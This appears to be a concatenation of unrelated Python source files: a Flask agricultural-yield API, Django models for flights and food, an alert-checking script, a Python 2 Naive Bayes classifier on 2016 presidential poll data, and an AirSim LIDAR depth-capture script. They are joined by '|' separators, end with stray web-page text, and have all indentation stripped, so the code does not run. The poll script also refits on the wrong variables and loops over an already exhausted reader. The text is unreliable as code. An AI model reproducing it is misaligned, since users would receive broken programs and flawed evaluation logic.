base_url = 'https://raw.githubusercontent.com/bssughosh/agri-guide-data/master/datasets/weather/'
file = 'places.csv'
df = pd.read_csv(base_url + file)
if len(state_id) == 1:
state_id = state_id[0].split(',')
state_id = [(int(s) - 1) for s in state_id]
print(f'/get_state_value endpoint called with state_id={state_id}')
if state_id == [1000, ]:
return jsonify({_keyNameStates: ['Test', ]})
states = list(df['State'].unique())
res = []
for s in state_id:
res.append(states[s])
print(f'/get_state_value endpoint returned => {res}')
return jsonify({_keyNameStates: res}), 200
@app.route('/get_dists')
def get_dist():
state_id = request.args.get(_queryParamStateId)
if state_id is None:
return jsonify({'message': 'State ID not found'}), 404
try:
state_id = int(state_id)
if state_id == 1000:
return jsonify({_keyNameDistrict: [{_keyNameId: 'Test', _keyNameStateId: 'Test', _keyNameName: 'Test'}, ]})
except ValueError:
return jsonify({'message': 'State ID not found'}), 404
print(f'/get_dists endpoint called with state_id={state_id}')
base_url = 'https://raw.githubusercontent.com/bssughosh/agri-guide-data/master/datasets/weather/'
file = 'places.csv'
df = pd.read_csv(base_url + file)
df['State'] = df['State'].apply(lambda c: preprocessing(c))
df['District'] = df['District'].apply(lambda c: preprocessing(c))
res = {}
res1 = []
k = 1
p = df.iloc[0, 0]
for i, j in df.iterrows():
if j[0] != p:
k += 1
p = j[0]
if state_id == k:
t = {_keyNameId: str(i), _keyNameStateId: str(k), _keyNameName: j[1]}
res1.append(t)
res[_keyNameDistrict] = res1
return jsonify(res), 200
@app.route('/get_dist_value')
def get_dist_for_dist_id():
dist_id = request.args.getlist(_queryParamDistId)
base_url = 'https://raw.githubusercontent.com/bssughosh/agri-guide-data/master/datasets/weather/'
file = 'places.csv'
df = pd.read_csv(base_url + file)
if len(dist_id) == 1:
dist_id = dist_id[0].split(',')
dist_id = [int(d) for d in dist_id]
print(f'/get_dist_value endpoint called with dist_id={dist_id}')
if dist_id == [1000, ]:
return jsonify({_keyNameDists: ['Test', ]})
dists = list(df['District'])
res = []
for d in dist_id:
res.append(dists[d])
print(f'/get_dist_value endpoint returned => {res}')
return jsonify({_keyNameDists: res}), 200
@app.route('/get_seasons')
def get_seasons():
state = request.args.get(_queryParamState)
dist = request.args.get(_queryParamDist)
print(f'/get_types_of_crops endpoint called with state={state} and '
f'dist={dist}')
if state == 'Test' and dist == 'Test':
return jsonify({_keyNameSeasons: ['Test', ]})
base_url = 'https://raw.githubusercontent.com/bssughosh/agri-guide-data/master/datasets/yield/'
file = 'found1_all_18.csv'
df = pd.read_csv(base_url + file)
df1 = df[df['State'] == state]
df1 = df1[df1['District'] == dist]
seasons = []
if df1.shape[0] > 0:
seasons = list(df1['Season'].unique())
return jsonify({_keyNameSeasons: seasons}), 200
@app.route('/get_crops')
def get_crops():
state = request.args.get(_queryParamState)
dist = request.args.get(_queryParamDist)
season = request.args.get(_queryParamSeason)
print(f'/get_crops endpoint called with state={state}, '
f'dist={dist} and season={season}')
if state == 'Test' and dist == 'Test' and season == 'Test':
return jsonify({_keyNameCrops: [{_keyNameCropId: 'Test', _keyNameName: 'Test', }, ]})
base_url = 'https://raw.githubusercontent.com/bssughosh/agri-guide-data/master/datasets/yield/'
file = 'found1_all_18.csv'
df = pd.read_csv(base_url + file)
all_crops = list(df['Crop'].unique())
all_crops_dict = {}
for i, crop in enumerate(all_crops):
all_crops_dict[crop] = str(i)
df1 = df[df['State'] == state]
df1 = df1[df1['District'] == dist]
df1 = df1[df1['Season'] == season]
crops_res = []
if df1.shape[0] > 0:
crops = list(df1['Crop'].unique())
for crop in crops:
crops_res.append({_keyNameCropId: all_crops_dict[crop], _keyNameName: crop, })
return jsonify({_keyNameCrops: crops_res}), 200
@app.route('/yield')
def predict_yield():
state = request.args.get(_queryParamState)
dist = request.args.get(_queryParamDist)
season = request.args.get(_queryParamSeason)
crop = request.args.get(_queryParamCrop)
state = state.replace(' ', '+')
dist = dist.replace(' ', '+')
if state is None or dist is None or season is None or crop is None:
return jsonify({'message': 'The requested location cannot be processed'}), 404
print(f'/yield endpoint called with state={state}, '
f'dist={dist}, season={season} and crop={crop}')
if state == 'Test' and dist == 'Test' and season == 'Test' and crop == 'Test':
return jsonify({_keyNameYield: [1.0, ]})
files = os.listdir('outputs/yield')
file = dist + ',' + state + ',' + season + ',' + crop + '.csv'
try:
if file not in files:
# yield_caller(state, dist, season, crop)
return jsonify({'message': 'The requested location cannot be processed'}), 404
print(f'All yield prediction complete for state={state}, dist={dist}'
f', season={season} and crop={crop}')
df1 = pd.read_csv(f'outputs/yield/{file}')
my_values = {
_keyNameYield: df1['Predicted'].to_list(),
}
return jsonify(my_values), 200
except FileNotFoundError:
return jsonify({'message': 'The requested location cannot be processed'}), 404
@app.route('/statistics_data')
def generate_statistics_data():
state = request.args.get(_queryParamState)
dist = request.args.get(_queryParamDist)
state = state.replace(' ', '+')
dist = dist.replace(' ', '+')
if state is None or dist is None:
return jsonify({'message': 'The requested location cannot be processed'}), 404
print(f'/statistics_data endpoint called with state={state} and '
f'dist={dist}')
if state == 'Test' and dist == 'Test':
return jsonify({_keyNameTemperature: [{'y1': 'Test'}], _keyNameHumidity: [{'y1': 'Test'}],
_keyNameRainfall: [{'y1': 'Test'}, ]})
res = {}
try:
rain = fetch_rainfall_whole_data(state, dist)
temp = fetch_temp_whole_data(state, dist)
humidity = fetch_humidity_whole_data(state, dist)
res[_keyNameTemperature] = temp
res[_keyNameHumidity] = humidity
res[_keyNameRainfall] = rain
except:
return jsonify({'message': 'The requested location cannot be processed'}), 404
return jsonify(res), 200
# Uncomment when running locally
# app.run(port=4999)
# Uncomment when pushing to GCP
# if __name__ == "__main__":
# app.run(host='0.0.0.0', port=4999, debug=True)
|
from django.db import models
# Create your models here.
class passengers(models.Model):
From=models.CharField(max_length=50)
To=models.CharField(max_length=50)
Date=models.DateField()
no_of_people=models.CharField(max_length=20)
class flit(models.Model):
name=models.CharField(max_length=50)
no=models.IntegerField()
fare=models.IntegerField()
time=models.CharField(max_length=50)
image=models.ImageField()
class food(models.Model):
name=models.CharField(max_length=50)
no=models.IntegerField()
food_cost=models.IntegerField()
image=models.ImageField()
|
from src.common import database
from src.models.alerts import alert
database.Database.initialize()
alert.check_alerts()
|
from sklearn.naive_bayes import GaussianNB
import numpy as np
from scipy import stats
from sklearn.metrics import jaccard_similarity_score
from numpy import array
from sklearn.metrics import accuracy_score
#assigning predictor and target variables
import csv
reader = csv.DictReader(open('presidential_polls.csv', 'rU'))
myList =[]
myList1=[]
VL=[]
VL1=[]
V2L =[]
V2L1=[]
V3L1=[]
V3L=[]
V4L=[]
V4L1=[]
V5L1=[]
V5L =[]
for row in reader:
if float(row['adjpoll_clinton']) > float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) > float(row['rawpoll_trump']):
myList.append([1.00,0.00])
myList1.append(1.00)
elif float(row['adjpoll_clinton']) < float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) < float(row['rawpoll_trump']):
myList.append([0.00, 1.00])
myList1.append(0.00)
x= array(myList)
z= array(myList1)
y = z.flat
print type(y)
print y
model = GaussianNB()
model.fit(x,y)
predicted = model.predict([[0,0],[0,1],[1,1],[1,0]])
print predicted
print accuracy_score([0,0,0,0],predicted)
print jaccard_similarity_score([0,0,0,0],predicted)
print "The mean error is:"
print stats.sem(myList, axis=None, ddof=0)
for row in reader:
if row['grade']=="A+" or row['grade']=="A":
if float(row['adjpoll_clinton']) > float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) > float(row['rawpoll_trump']):
VL.append([1.00,0.00])
VL1.append(1.00)
elif float(row['adjpoll_clinton']) < float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) < float(row['rawpoll_trump']):
VL.append([0.00, 1.00])
VL1.append(0.00)
print VL
print VL1
x1= array(VL)
z1= array(VL1)
y1 = z1.flat
model1 = GaussianNB()
model1.fit(x,y)
predicted1 = model1.predict([[0,0],[0,1],[1,1],[1,0]])
print predicted1
print accuracy_score([0,0,0,0],predicted1)
print jaccard_similarity_score([0,0,0,0],predicted1)
print "The mean error is:"
print stats.sem(VL, axis=None, ddof=0)
for row in reader:
if row['grade']=="A-" or row['grade']=="B+":
if float(row['adjpoll_clinton']) > float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) > float(row['rawpoll_trump']):
V2L.append([1.00,0.00])
V2L1.append(1.00)
elif float(row['adjpoll_clinton']) < float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) < float(row['rawpoll_trump']):
V2L.append([0.00, 1.00])
V2L1.append(0.00)
x2= array(V2L)
z2= array(V2L1)
y2 = z2.flat
model2 = GaussianNB()
model2.fit(x2,y2)
predicted2 = model2.predict([[0,0],[0,1],[1,1],[1,0]])
print predicted2
print accuracy_score([0,0,0,0],predicted2)
print jaccard_similarity_score([0,0,0,0],predicted2)
print "The mean error is:"
print stats.sem(V2L, axis=None, ddof=0)
for row in reader:
if row['grade']=="B" or row['grade']=="B-":
if float(row['adjpoll_clinton']) > float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) > float(row['rawpoll_trump']):
V3L.append([1.00,0.00])
V3L1.append(1.00)
elif float(row['adjpoll_clinton']) < float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) < float(row['rawpoll_trump']):
V3L.append([0.00, 1.00])
V3L1.append(0.00)
x3= array(V3L)
z3= array(V3L1)
y3 = z3.flat
model3 = GaussianNB()
model3.fit(x3,y3)
predicted3 = model3.predict([[0,0],[0,1],[1,1],[1,0]])
print predicted3
print accuracy_score([0,0,0,0],predicted3)
print jaccard_similarity_score([0,0,0,0],predicted3)
print "The mean error is:"
print stats.sem(V3L, axis=None, ddof=0)
for row in reader:
if row['grade']=="C+" or row['grade']=="C":
if float(row['adjpoll_clinton']) > float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) > float(row['rawpoll_trump']):
V4L.append([1.00,0.00])
V4L1.append(1.00)
elif float(row['adjpoll_clinton']) < float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) < float(row['rawpoll_trump']):
V4L.append([0.00, 1.00])
V4L1.append(0.00)
x4= array(V4L)
z4= array(V4L1)
y4 = z4.flat
model4 = GaussianNB()
model4.fit(x4,y4)
predicted4 = model4.predict([[0,0],[0,1],[1,1],[1,0]])
print predicted4
print accuracy_score([0,0,0,0],predicted4)
print jaccard_similarity_score([0,0,0,0],predicted4)
print "The mean error is:"
print stats.sem(V4L, axis=None, ddof=0)
for row in reader:
if row['grade']=="C-" or row['grade']=="":
if float(row['adjpoll_clinton']) > float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) > float(row['rawpoll_trump']):
V5L.append([1.00,0.00])
V5L1.append(1.00)
elif float(row['adjpoll_clinton']) < float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) < float(row['rawpoll_trump']):
V5L.append([0.00, 1.00])
V5L1.append(0.00)
x5= array(V5L)
z5= array(V5L1)
y5 = z5.flat
model5 = GaussianNB()
model5.fit(x5,y5)
predicted5 = model5.predict([[0,0],[0,1],[1,1],[1,0]])
print predicted5
print accuracy_score([0,0,0,0],predicted5)
print jaccard_similarity_score([0,0,0,0],predicted5)
print "The mean error is:"
print stats.sem(V5L, axis=None, ddof=0) |
from __future__ import print_function
import argparse
import numpy as np
import os
import time
import airsim
from airsim.types import Pose, Vector3r, Quaternionr
from airsim import utils as sim_util
from airsim.utils import to_quaternion
AS_CAM_ID = 1
def handle_arguments(parser):
parser.add_argument("--pose", type=str, default="0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0", \
help="The spatial pose of the first camera. 3-element xyz and 4-element quaternion with the last being w.")
parser.add_argument("--out-dir", type=str, default="./", \
help="The output directory.")
return parser.parse_args()
def convert_pose_string_2_array(s):
"""
s is assumed to be in the form "0.0, 0.0, 0.0, 0.0, 0.0, 0.0"
"""
return np.fromstring( s, dtype=np.float64, sep="," )
def convert_2_pose(p, e):
"""
p: A 3-element NumPy array, the position.
q: A 4-element NumPy array, a quaternion witht he last element being w.
"""
return Pose( Vector3r( p[0], p[1], p[2] ), to_quaternion( e[0], e[1], e[2] ) )
class CamControl(object):
def __init__(self, camID, distLimit=10000):
super(CamControl, self).__init__()
self.camID = camID
self.cmdClient = None
self.imgType = None
self.distLimit = distLimit
self.maxTrial = 2
def initialize(self):
# Connect to airsim.
self.cmdClient = airsim.VehicleClient()
self.cmdClient.confirmConnection()
self.imgType = [ airsim.ImageRequest( self.camID, airsim.ImageType.DepthPlanner, True ) ]
def get_depth_campos(self):
'''
cam_pose: 0: [x_val, y_val, z_val] 1: [x_val, y_val, z_val, w_val]
'''
imgRes = self.cmdClient.simGetImages(self.imgType)
if imgRes is None or imgRes[0].width==0: # Sometime the request returns no image
return None, None
depthFront = sim_util.list_to_2d_float_array( \
imgRes[0].image_data_float,
imgRes[0].width, imgRes[0].height )
depthFront[depthFront > self.distLimit] = self.distLimit
camPose = ( imgRes[0].camera_position, imgRes[0].camera_orientation )
return depthFront, camPose
def set_vehicle_pose(self, pose, ignoreCollison=True, vehicleName=""):
self.cmdClient.simSetVehiclePose( pose, ignoreCollison, vehicleName ) # amigo: this is supposed to be used in CV mode
time.sleep(0.1)
def capture_LIDAR_depth(self, p, q):
"""
p: A 3-element NumPy array, the position.
q: A 4-element NumPy array, quaternion, w is the last element.
"""
faces = [ 0, 1, 2, -1 ] # Front, right, back, left.
depthList = []
q0 = Quaternionr(q[0], q[1], q[2], q[3])
for face in faces:
# Compose a AirSim Pose object.
yaw = np.pi / 2 * face
yq = to_quaternion( 0, 0, yaw )
# q = to_quaternion( e[0], e[1], e[2] )
q1 = yq * q0
pose = Pose( Vector3r( p[0], p[1], p[2] ), q1 )
# Change the vehicle pose.
self.set_vehicle_pose(pose)
# Get the image.
for i in range(self.maxTrial):
depth, _ = self.get_depth_campos()
if depth is None:
print("Fail for trail %d on face %d. " % ( i, face ))
continue
if ( depth is None ):
raise Exception("Could not get depth image for face %d. " % ( face ))
# Get a valid depth.
depthList.append(depth)
return depthList
def save_depth_list(fn, depthList):
if ( len(depthList) != 4 ):
raise Exception("Expecting the depths in the list to be 4. len(depthList) = %d. " % ( len(depthList) ))
# Test the output directory.
parts = os.path.split(fn)
if ( not os.path.isdir( parts[0] ) ):
os.makedirs( parts[0] )
np.savez( fn, d0=depthList[0], d1=depthList[1], d2=depthList[2], d3=depthList[3] )
if __name__ == "__main__":
print("Capture depth images for simulating LIDAR.")
parser = argparse.ArgumentParser(description="Capture depth images for simulating LIDAR.")
args = handle_arguments(parser)
cc = CamControl(AS_CAM_ID)
cc.initialize()
a = convert_pose_string_2_array( args.pose )
if ( a.size != 7 ):
raise Exception("Get pose = {}. ".format( a ))
depthList = cc.capture_LIDAR_depth( a[:3], a[3:] )
# Save the depth to filesystem.
save_depth_list("%s/LIDARDepth.npz" % (args.out_dir), depthList)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.